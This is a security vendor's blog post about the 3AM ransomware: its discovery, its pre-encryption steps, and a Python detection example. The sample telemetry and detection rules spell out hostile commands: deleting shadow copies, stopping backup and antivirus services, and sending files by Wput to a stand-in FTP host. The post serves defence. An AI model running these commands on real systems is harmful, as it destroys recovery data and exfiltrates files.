
3AM Ransomware

Chris Swagler | November 6th, 2023


In a digital realm teeming with evolving cyber threats, a new variant named the 3AM ransomware has recently surfaced, marking its presence with a distinct modus operandi. This article delves into the discovery, characteristics, and implications of this emerging malware, shedding light on the ever-evolving landscape of cybersecurity.

A Fallback Strategy Unveils 3AM Ransomware

The spotlight initially fell on 3AM when it was employed as a fallback plan by a ransomware affiliate. The threat operator had previously attempted to deploy the notorious LockBit ransomware, often attributed to the Bitwise Spider or Syrphid groups, but encountered obstacles. As a result, the threat actor resorted to 3AM, making this malware’s existence known.

The Enigmatic Origins of 3AM Ransomware

A defining feature of 3AM is its unique coding. This ransomware is written in Rust, a language not associated with any known ransomware family. This distinction sets it apart as a wholly new and uncharted breed of malware. The creators and affiliates behind 3AM remain mysterious, with no discernible connections to established cybercrime groups.

The Intricate Dance of 3AM Ransomware

Before encrypting files, 3AM carries out a series of pre-encryption steps. It attempts to disable multiple services running on the compromised system, specifically targeting security and backup products from prominent vendors such as Veeam, Acronis, Ivanti, McAfee, and Symantec. This meticulous approach neutralizes potential obstacles that might hinder the encryption process. Once the encryption procedure is complete, files receive the “.THREEAMTIME” extension. Additionally, the malware attempts to delete Volume Shadow copies, eliminating any chances of data recovery.

The Tantalizing Clues

The journey of a 3AM ransomware attack commences with a “gpresult” command, extracting the system’s policy settings for a designated user. This reconnaissance phase is followed by a series of commands commonly used for network enumeration, server enumeration, and user persistence, and by the use of the Wput FTP client to transmit stolen files to the threat operator’s server. Symantec’s analysis reveals that the 3AM executable recognizes various command-line parameters, including an access key, an encryption method (local or net), and parameters related to encryption speed control.
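The behaviors described in the two sections above (gpresult reconnaissance, stopping security and backup services, shadow copy deletion, Wput transfers, and the “.THREEAMTIME” extension) are individually noisy but telling in combination. The following is an added example, not code from SpearTip or Symantec, that correlates them per host within a time window. The event format, regexes, threshold, host names, and sample events are constructed assumptions, as is the choice of net/sc and vssadmin command forms as the way these actions show up in process logs.

```python
import re
from collections import defaultdict

# Behaviors named in the article; the regexes are this example's assumptions.
VENDORS = r"(veeam|acronis|ivanti|mcafee|symantec)"
RULES = {
    "policy_recon": re.compile(r"\bgpresult(\.exe)?\b", re.I),
    "service_stop": re.compile(r"\b(net1?|sc)(\.exe)?\s+stop\b.*" + VENDORS, re.I),
    "shadow_delete": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "wput_exfil": re.compile(r"\bwput(\.exe)?\b", re.I),
    "threeam_ext": re.compile(r"\.THREEAMTIME\b", re.I),
}

# Constructed sample telemetry: (seconds, host, command line or created file path).
EVENTS = [
    (0, "WS01", "gpresult /r"),
    (120, "WS01", 'net stop "Veeam Backup Service"'),
    (300, "WS01", "vssadmin delete shadows /all /quiet"),
    (900, "WS01", r"C:\Users\jdoe\Documents\budget.xlsx.THREEAMTIME"),
    (50, "WS02", "gpresult /r"),                  # lone admin command
    (0, "SRV03", "gpresult.exe /r"),
    (100, "SRV03", "sc stop McAfeeFramework"),
    (90000, "SRV03", "wput files.zip ftp://192.0.2.10/"),  # a day later
]

def correlate(events, window_s=3600):
    """Per host: largest set of distinct behaviors seen within window_s seconds."""
    hits = defaultdict(list)
    for ts, host, text in sorted(events):
        hits[host] += [(ts, name) for name, rx in RULES.items() if rx.search(text)]
    best = {}
    for host, seq in hits.items():
        best[host] = set()
        for start, _ in seq:
            seen = {n for ts, n in seq if 0 <= ts - start <= window_s}
            if len(seen) > len(best[host]):
                best[host] = seen
    return best

def alerts(events, threshold=3, window_s=3600):
    """Hosts showing at least `threshold` distinct behaviors inside one window."""
    found = correlate(events, window_s)
    return {h: sorted(b) for h, b in found.items() if len(b) >= threshold}

if __name__ == "__main__":
    print(alerts(EVENTS))
```

A single gpresult or service stop is routine administration, so the threshold and window keep WS02 and SRV03 quiet while WS01 is flagged.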

The Limited Impact of 3AM

Despite being a new and relatively unfamiliar threat, 3AM’s debut in the cyber arena was unsuccessful. In a specific incident, the threat actor deployed the ransomware on only three machines within the target organization. Encouragingly, defense mechanisms thwarted its activities on two of these systems, highlighting the resilience of existing cybersecurity measures.

A Glimpse into the Future

The emergence of 3AM ransomware underscores the ever-evolving nature of cyber threats. As it gained prominence as an alternative to LockBit, it will likely attract the interest of other malicious actors. The cybersecurity community should remain vigilant, as 3AM may evolve and adapt, potentially posing a more significant threat.

The rise of 3AM ransomware is a stark reminder of the perpetual cat-and-mouse game between cybercriminals and defenders. While this new entrant was only partially successful in its debut, its existence signals a potential shift in the threat landscape. As cybersecurity professionals continue to adapt and fortify their defenses, the world watches closely for the next chapter in this ongoing cyber saga.

At SpearTip, our certified engineers work at our 24/7/365 Security Operations Center to continuously monitor companies’ data networks for new and current ransomware threats. They are ready to respond to incidents at a moment’s notice. Our risk assessments are designed to uncover security gaps and are accompanied by a technical summary complete with an individualized risk report detailing necessary steps to remediate the gaps. The ShadowSpear Platform, our integrable managed detection and response tool, uses comprehensive insights through unparalleled data normalization and visualizations to expose sophisticated unknown and advanced ransomware threats. Providing cybersecurity awareness training will help companies and their employees better understand the risks of the cyber landscape and develop impactful cybersecurity practices that can reduce the likelihood of cyberattacks.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.

